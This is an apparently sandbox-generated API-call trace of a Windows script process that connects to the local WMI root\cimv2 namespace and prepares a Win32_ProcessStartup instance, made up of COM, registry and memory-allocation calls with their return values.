[0039.746] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce0be0
[0039.746] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce1270
[0039.746] ResolveDelayLoadedAPI () returned 0x7ffb3ccf7000
[0039.746] CoCreateInstance (in: rclsid=0x7ffb2537d160*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffb2537d150*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xb8a8ce12a0 | out: ppv=0xb8a8ce12a0*=0xb8a8ce6ee0) returned 0x0
[0039.824] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8c62220
[0039.824] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8c6d9f0
[0039.824] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce0ba0
[0039.824] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0039.824] GetCurrentThreadId () returned 0x210
[0039.825] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0039.825] _wcsicmp (_String1="window", _String2="window") returned 0
[0039.825] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0039.825] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0039.825] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0039.825] IsCharSpaceW (wch=0x4c) returned 0
[0039.825] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0039.825] IsCharSpaceW (wch=0x4c) returned 0
[0039.825] LoadRegTypeLib (in: rguid=0x7ffb2537d600*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0xb8a8a2df68*=0x0 | out: pptlib=0xb8a8a2df68*=0xb8a8ce7170) returned 0x0
[0039.848] ITypeLib:GetTypeInfoOfGuid (in: This=0xb8a8ce7170, GUID=0xb8a8ce12d8*(Data1=0x76a6415b, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), ppTInfo=0xb8a8ce12c0 | out: ppTInfo=0xb8a8ce12c0*=0xb8a8ce7f58) returned 0x0
[0039.849] IUnknown:Release (This=0xb8a8ce7170) returned 0x1
[0039.849] IUnknown:AddRef (This=0xb8a8ce7f58) returned 0x2
[0039.849] DispGetIDsOfNames (in: ptinfo=0xb8a8ce7f58, rgszNames=0xb8a8a2dfd0*="ConnectServer", cNames=0x1, rgdispid=0xb8a8a2e1c4 | out: rgdispid=0xb8a8a2e1c4*=1) returned 0x0
[0039.849] IUnknown:Release (This=0xb8a8ce7f58) returned 0x1
[0039.849] IUnknown:AddRef (This=0xb8a8ce7f58) returned 0x2
[0039.849] ITypeInfo:LocalInvoke (This=0xb8a8ce7f58) returned 0x0
[0039.849] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0039.849] GetCurrentThreadId () returned 0x210
[0039.849] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Wbem\\Scripting", ulOptions=0x0, samDesired=0x1, phkResult=0xb8a8a2d5e8 | out: phkResult=0xb8a8a2d5e8*=0x4ec) returned 0x0
[0039.849] RegQueryValueExW (in: hKey=0x4ec, lpValueName="Default Namespace", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xb8a8a2d5e0*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xb8a8a2d5e0*=0x16) returned 0x0
[0039.849] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce6840
[0039.849] RegQueryValueExW (in: hKey=0x4ec, lpValueName="Default Namespace", lpReserved=0x0, lpType=0x0, lpData=0xb8a8ce6840, lpcbData=0xb8a8a2d5e0*=0x16 | out: lpType=0x0, lpData=0xb8a8ce6840*=0x72, lpcbData=0xb8a8a2d5e0*=0x16) returned 0x0
[0039.849] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce6e40
[0039.850] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0039.850] RegCloseKey (hKey=0x4ec) returned 0x0
[0039.850] CoCreateInstance (in: rclsid=0x7ffb2537d918*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffb2537d928*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0xb8a8a2d7d0 | out: ppv=0xb8a8a2d7d0*=0xb8a8cdfc90) returned 0x0
[0039.931] SysStringLen (param_1=".") returned 0x1
[0039.931] WbemDefPath:IWbemPath:SetServer (This=0xb8a8cdfc90, Name=".") returned 0x0
[0039.931] CoCreateInstance (in: rclsid=0x7ffb2537d918*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffb2537d928*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0xb8a8a2d580 | out: ppv=0xb8a8a2d580*=0xb8a8cde310) returned 0x0
[0039.931] CoCreateInstance (in: rclsid=0x7ffb2537d918*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffb2537d928*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0xb8a8a2d508 | out: ppv=0xb8a8a2d508*=0xb8a8cde250) returned 0x0
[0039.931] WbemDefPath:IWbemPath:SetText (This=0xb8a8cde250, uMode=0x4, pszPath="root\\cimv2") returned 0x0
[0039.932] WbemDefPath:IUnknown:Release (This=0xb8a8cde250) returned 0x0
[0039.932] SysStringLen (param_1="root\\cimv2") returned 0xa
[0039.932] WbemDefPath:IWbemPath:SetText (This=0xb8a8cde310, uMode=0xc, pszPath="root\\cimv2") returned 0x0
[0039.932] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0xb8a8cde310, puCount=0xb8a8a2d5e0 | out: puCount=0xb8a8a2d5e0*=0x2) returned 0x0
[0039.932] WbemDefPath:IWbemPath:RemoveAllNamespaces (This=0xb8a8cdfc90) returned 0x0
[0039.932] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0xb8a8cde310, uIndex=0x0, puNameBufLength=0xb8a8a2d550*=0x0, pName=0x0 | out: puNameBufLength=0xb8a8a2d550*=0x5, pName=0x0) returned 0x0
[0039.932] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce6a20
[0039.932] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0xb8a8cde310, uIndex=0x0, puNameBufLength=0xb8a8a2d550*=0x5, pName="cimv2" | out: puNameBufLength=0xb8a8a2d550*=0x5, pName="root") returned 0x0
[0039.932] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0039.932] WbemDefPath:IWbemPath:SetNamespaceAt (This=0xb8a8cdfc90, uIndex=0x0, pszName="root") returned 0x0
[0039.932] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0xb8a8cde310, uIndex=0x1, puNameBufLength=0xb8a8a2d550*=0x0, pName=0x0 | out: puNameBufLength=0xb8a8a2d550*=0x6, pName=0x0) returned 0x0
[0039.932] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8cf3950
[0039.932] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0xb8a8cde310, uIndex=0x1, puNameBufLength=0xb8a8a2d550*=0x6, pName="" | out: puNameBufLength=0xb8a8a2d550*=0x6, pName="cimv2") returned 0x0
[0039.932] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0039.932] WbemDefPath:IWbemPath:SetNamespaceAt (This=0xb8a8cdfc90, uIndex=0x1, pszName="cimv2") returned 0x0
[0039.932] WbemDefPath:IUnknown:Release (This=0xb8a8cde310) returned 0x0
[0039.932] WbemDefPath:IWbemPath:GetText (in: This=0xb8a8cdfc90, lFlags=4, puBuffLength=0xb8a8a2d5e0*=0x0, pszText=0x0 | out: puBuffLength=0xb8a8a2d5e0*=0xf, pszText=0x0) returned 0x0
[0039.932] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8cd4cd0
[0039.932] WbemDefPath:IWbemPath:GetText (in: This=0xb8a8cdfc90, lFlags=4, puBuffLength=0xb8a8a2d5e0*=0xf, pszText="cimv2" | out: puBuffLength=0xb8a8a2d5e0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0
[0039.932] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0039.932] WbemDefPath:IUnknown:Release (This=0xb8a8cdfc90) returned 0x0
[0039.932] WbemLocator:IWbemLocator:ConnectServer (in: This=0xb8a8ce6ee0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xb8a8a2d720 | out: ppNamespace=0xb8a8a2d720*=0xb8a8c63010) returned 0x0
[0039.934] NtdllDefWindowProc_W (hWnd=0x5016e, Msg=0x7f, wParam=0x1, lParam=0x60) returned 0x10027
[0040.311] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce1cc0
[0040.311] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8c6dc70
[0040.311] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8cf7b30
[0040.311] IUnknown:QueryInterface (in: This=0xb8a8c63010, riid=0x7ffb2537d3f8*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xb8a8a2d730 | out: ppvObject=0xb8a8a2d730*=0xb8a8cf36d0) returned 0x0
[0040.311] IClientSecurity:QueryBlanket (in: This=0xb8a8cf36d0, pProxy=0xb8a8c63010, pAuthnSvc=0xb8a8a2d7a8, pAuthzSvc=0xb8a8a2d780, pServerPrincName=0x0, pAuthnLevel=0xb8a8a2d640, pImpLevel=0xb8a8a2d638, pAuthInfo=0x0, pCapabilites=0xb8a8a2d7ac | out: pAuthnSvc=0xb8a8a2d7a8*=0xa, pAuthzSvc=0xb8a8a2d780*=0x0, pServerPrincName=0x0, pAuthnLevel=0xb8a8a2d640*=0x6, pImpLevel=0xb8a8a2d638*=0x2, pAuthInfo=0x0, pCapabilites=0xb8a8a2d7ac*=0x1) returned 0x0
[0040.311] IUnknown:Release (This=0xb8a8cf36d0) returned 0x1
[0040.311] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0040.311] GetCurrentThreadId () returned 0x210
[0040.311] IUnknown:QueryInterface (in: This=0xb8a8c63010, riid=0x7ffb2537d3f8*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xb8a8a2d748 | out: ppvObject=0xb8a8a2d748*=0xb8a8cf36d0) returned 0x0
[0040.311] IClientSecurity:CopyProxy (in: This=0xb8a8cf36d0, pProxy=0xb8a8c63010, ppCopy=0xb8a8a2d738 | out: ppCopy=0xb8a8a2d738*=0xb8a8c61c60) returned 0x0
[0040.311] IUnknown:QueryInterface (in: This=0xb8a8c61c60, riid=0x7ffb2537d3f8*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xb8a8a2d4c0 | out: ppvObject=0xb8a8a2d4c0*=0xb8a8cf36d0) returned 0x0
[0040.311] IClientSecurity:QueryBlanket (in: This=0xb8a8cf36d0, pProxy=0xb8a8c61c60, pAuthnSvc=0xb8a8a2d560, pAuthzSvc=0xb8a8a2d510, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0 | out: pAuthnSvc=0xb8a8a2d560*=0xa, pAuthzSvc=0xb8a8a2d510*=0x0, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0) returned 0x0
[0040.311] IUnknown:Release (This=0xb8a8cf36d0) returned 0x3
[0040.311] IUnknown:QueryInterface (in: This=0xb8a8c61c60, riid=0x7ffb2537d388*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xb8a8a2d480 | out: ppvObject=0xb8a8a2d480*=0xb8a8cf3718) returned 0x0
[0040.311] IUnknown:QueryInterface (in: This=0xb8a8c61c60, riid=0x7ffb2537d3f8*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xb8a8a2d4c0 | out: ppvObject=0xb8a8a2d4c0*=0xb8a8cf36d0) returned 0x0
[0040.311] IClientSecurity:SetBlanket (This=0xb8a8cf36d0, pProxy=0xb8a8c61c60, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
[0040.311] IUnknown:Release (This=0xb8a8cf36d0) returned 0x4
[0040.311] IUnknown:Release (This=0xb8a8cf3718) returned 0x3
[0040.311] IUnknown:Release (This=0xb8a8cf36d0) returned 0x2
[0040.312] IUnknown:AddRef (This=0xb8a8c61c60) returned 0x3
[0040.312] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8c6def0
[0040.312] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce0de0
[0040.312] IUnknown:Release (This=0xb8a8c63010) returned 0x2
[0040.312] IUnknown:Release (This=0xb8a8ce7f58) returned 0x1
[0040.312] _wcsicmp (_String1="window", _String2="window") returned 0
[0040.312] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.312] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.312] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.312] IsCharSpaceW (wch=0x53) returned 0
[0040.312] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.312] IsCharSpaceW (wch=0x53) returned 0
[0040.312] LoadRegTypeLib (in: rguid=0x7ffb2537d600*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0xb8a8a2e008*=0x0 | out: pptlib=0xb8a8a2e008*=0xb8a8ce7170) returned 0x0
[0040.313] ITypeLib:GetTypeInfoOfGuid (in: This=0xb8a8ce7170, GUID=0xb8a8ce1d28*(Data1=0xd2f68443, Data2=0x85dc, Data3=0x427e, Data4=([0]=0x91, [1]=0xd8, [2]=0x36, [3]=0x65, [4]=0x54, [5]=0xcc, [6]=0x75, [7]=0x4c)), ppTInfo=0xb8a8ce1d10 | out: ppTInfo=0xb8a8ce1d10*=0xb8a8ce80b8) returned 0x0
[0040.313] IUnknown:Release (This=0xb8a8ce7170) returned 0x2
[0040.313] IUnknown:AddRef (This=0xb8a8ce80b8) returned 0x2
[0040.313] DispGetIDsOfNames (in: ptinfo=0xb8a8ce80b8, rgszNames=0xb8a8a2e070*="Security_", cNames=0x1, rgdispid=0xb8a8a2e14c | out: rgdispid=0xb8a8a2e14c*=19) returned 0x0
[0040.313] IUnknown:Release (This=0xb8a8ce80b8) returned 0x1
[0040.313] IUnknown:AddRef (This=0xb8a8ce80b8) returned 0x2
[0040.313] ITypeInfo:LocalInvoke (This=0xb8a8ce80b8) returned 0x0
[0040.313] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0040.313] GetCurrentThreadId () returned 0x210
[0040.313] IUnknown:Release (This=0xb8a8ce80b8) returned 0x1
[0040.313] LoadRegTypeLib (in: rguid=0x7ffb2537d600*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0xb8a8a2dee8*=0x0 | out: pptlib=0xb8a8a2dee8*=0xb8a8ce7170) returned 0x0
[0040.314] ITypeLib:GetTypeInfoOfGuid (in: This=0xb8a8ce7170, GUID=0xb8a8c6dcc8*(Data1=0xb54d66e6, Data2=0x2287, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x33, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), ppTInfo=0xb8a8c6dcb0 | out: ppTInfo=0xb8a8c6dcb0*=0xb8a8ce8168) returned 0x0
[0040.314] IUnknown:Release (This=0xb8a8ce7170) returned 0x3
[0040.314] IUnknown:AddRef (This=0xb8a8ce8168) returned 0x2
[0040.314] DispGetIDsOfNames (in: ptinfo=0xb8a8ce8168, rgszNames=0xb8a8a2dfb0*="ImpersonationLevel", cNames=0x1, rgdispid=0xb8a8a2e050 | out: rgdispid=0xb8a8a2e050*=1) returned 0x0
[0040.314] IUnknown:Release (This=0xb8a8ce8168) returned 0x1
[0040.314] IUnknown:AddRef (This=0xb8a8ce8168) returned 0x2
[0040.314] ITypeInfo:LocalInvoke (This=0xb8a8ce8168) returned 0x0
[0040.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0040.315] GetCurrentThreadId () returned 0x210
[0040.315] IUnknown:QueryInterface (in: This=0xb8a8c61c60, riid=0x7ffb2537d3f8*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xb8a8a2d798 | out: ppvObject=0xb8a8a2d798*=0xb8a8cf36d0) returned 0x0
[0040.315] IClientSecurity:QueryBlanket (in: This=0xb8a8cf36d0, pProxy=0xb8a8c61c60, pAuthnSvc=0xb8a8a2d794, pAuthzSvc=0xb8a8a2d790, pServerPrincName=0x0, pAuthnLevel=0xb8a8a2d800, pImpLevel=0xb8a8a2d7f8, pAuthInfo=0x0, pCapabilites=0xb8a8a2d808 | out: pAuthnSvc=0xb8a8a2d794*=0xa, pAuthzSvc=0xb8a8a2d790*=0x0, pServerPrincName=0x0, pAuthnLevel=0xb8a8a2d800*=0x6, pImpLevel=0xb8a8a2d7f8*=0x3, pAuthInfo=0x0, pCapabilites=0xb8a8a2d808*=0x20) returned 0x0
[0040.315] IUnknown:Release (This=0xb8a8cf36d0) returned 0x2
[0040.315] IUnknown:Release (This=0xb8a8ce8168) returned 0x1
[0040.315] IUnknown:AddRef (This=0xb8a8ce80b8) returned 0x2
[0040.315] DispGetIDsOfNames (in: ptinfo=0xb8a8ce80b8, rgszNames=0xb8a8a2dfd0*="Get", cNames=0x1, rgdispid=0xb8a8a2e1c4 | out: rgdispid=0xb8a8a2e1c4*=1) returned 0x0
[0040.315] IUnknown:Release (This=0xb8a8ce80b8) returned 0x1
[0040.315] IUnknown:AddRef (This=0xb8a8ce80b8) returned 0x2
[0040.315] ITypeInfo:LocalInvoke (This=0xb8a8ce80b8) returned 0x0
[0040.315] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0040.315] GetCurrentThreadId () returned 0x210
[0040.315] IUnknown:AddRef (This=0xb8a8c61c60) returned 0x3
[0040.315] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0040.315] GetCurrentThreadId () returned 0x210
[0040.315] IWbemServices:GetObject (in: This=0xb8a8c61c60, strObjectPath="Win32_ProcessStartup", lFlags=0, pCtx=0x0, ppObject=0xb8a8a2d478*=0x0, ppCallResult=0x0 | out: ppObject=0xb8a8a2d478*=0xb8a8cf9510, ppCallResult=0x0) returned 0x0
[0040.337] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8c791b0
[0040.337] IUnknown:AddRef (This=0xb8a8cf9510) returned 0x2
[0040.337] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce17f0
[0040.337] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8c6de50
[0040.337] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8c6d630
[0040.337] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce04e0
[0040.337] IUnknown:AddRef (This=0xb8a8c61c60) returned 0x4
[0040.337] SysStringLen (param_1="\\\\.\\root\\cimv2") returned 0xe
[0040.337] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8cf5ac0
[0040.337] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce0fa0
[0040.337] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce0560
[0040.337] IUnknown:AddRef (This=0xb8a8cf9510) returned 0x3
[0040.337] IUnknown:Release (This=0xb8a8cf9510) returned 0x2
[0040.337] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0xb8a8a2d408 | out: pperrinfo=0xb8a8a2d408*=0x0) returned 0x1
[0040.337] IUnknown:Release (This=0xb8a8c61c60) returned 0x3
[0040.337] IUnknown:Release (This=0xb8a8ce80b8) returned 0x1
[0040.337] _wcsicmp (_String1="window", _String2="window") returned 0
[0040.337] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.337] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.337] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.338] IsCharSpaceW (wch=0x6f) returned 0
[0040.338] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.338] IsCharSpaceW (wch=0x6f) returned 0
[0040.338] LoadRegTypeLib (in: rguid=0x7ffb2537d600*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0xb8a8a2dfd0*=0x0 | out: pptlib=0xb8a8a2dfd0*=0xb8a8ce7170) returned 0x0
[0040.338] ITypeLib:GetTypeInfoOfGuid (in: This=0xb8a8ce7170, GUID=0x7ffb2537d440*(Data1=0x269ad56a, Data2=0x8a67, Data3=0x4129, Data4=([0]=0xbc, [1]=0x8c, [2]=0x5, [3]=0x6, [4]=0xdc, [5]=0xfe, [6]=0x98, [7]=0x80)), ppTInfo=0xb8a8cf5af0 | out: ppTInfo=0xb8a8cf5af0*=0xb8a8ce82c8) returned 0x0
[0040.338] IUnknown:Release (This=0xb8a8ce7170) returned 0x4
[0040.338] IUnknown:AddRef (This=0xb8a8ce82c8) returned 0x2
[0040.338] DispGetIDsOfNames (in: ptinfo=0xb8a8ce82c8, rgszNames=0xb8a8a2e070*="SpawnInstance_", cNames=0x1, rgdispid=0xb8a8a2e14c | out: rgdispid=0xb8a8a2e14c*=18) returned 0x0
[0040.338] IUnknown:Release (This=0xb8a8ce82c8) returned 0x1
[0040.339] IUnknown:AddRef (This=0xb8a8ce82c8) returned 0x2
[0040.339] DispInvoke (_this=0xb8a8c791b0, ptinfo=0xb8a8ce82c8, dispidMember=18, wFlags=0x3, pparams=0xb8a8a2de90*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pvarResult=0xc0aa9fda38*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc0aaa48df8, varVal2=0x0), pexcepinfo=0xb8a8a2ded0, puArgErr=0xb8a8a2de10*=0x1f80) returned 0x0
[0040.339] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0040.339] GetCurrentThreadId () returned 0x210
[0040.339] IWbemClassObject:SpawnInstance (in: This=0xb8a8cf9510, lFlags=0, ppNewInstance=0xb8a8a2d540 | out: ppNewInstance=0xb8a8a2d540*=0xb8a8cf9880) returned 0x0
[0040.339] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8c78eb0
[0040.339] IUnknown:AddRef (This=0xb8a8cf9880) returned 0x2
[0040.339] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce18a0
[0040.339] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8c6d6d0
[0040.339] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8c6d770
[0040.339] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce0ae0
[0040.339] IUnknown:AddRef (This=0xb8a8c61c60) returned 0x4
[0040.339] SysStringLen (param_1="\\\\.\\root\\cimv2") returned 0xe
[0040.339] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8cf5bb0
[0040.339] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce10e0
[0040.340] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce1160
[0040.340] IUnknown:AddRef (This=0xb8a8cf9880) returned 0x3
[0040.340] IUnknown:Release (This=0xb8a8cf9880) returned 0x2
[0040.340] IUnknown:Release (This=0xb8a8ce82c8) returned 0x1
[0040.340] _wcsicmp (_String1="window", _String2="window") returned 0
[0040.340] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.340] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.340] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.340] IsCharSpaceW (wch=0x6f) returned 0
[0040.340] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.340] IsCharSpaceW (wch=0x6f) returned 0
[0040.340] LoadRegTypeLib (in: rguid=0x7ffb2537d600*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0xb8a8a2ded0*=0x0 | out: pptlib=0xb8a8a2ded0*=0xb8a8ce7170) returned 0x0
[0040.340] ITypeLib:GetTypeInfoOfGuid (in: This=0xb8a8ce7170, GUID=0x7ffb2537d440*(Data1=0x269ad56a, Data2=0x8a67, Data3=0x4129, Data4=([0]=0xbc, [1]=0x8c, [2]=0x5, [3]=0x6, [4]=0xdc, [5]=0xfe, [6]=0x98, [7]=0x80)), ppTInfo=0xb8a8cf5be0 | out: ppTInfo=0xb8a8cf5be0*=0xb8a8ce82c8) returned 0x0
[0040.340] IUnknown:Release (This=0xb8a8ce7170) returned 0x5
[0040.340] IUnknown:AddRef (This=0xb8a8ce82c8) returned 0x3
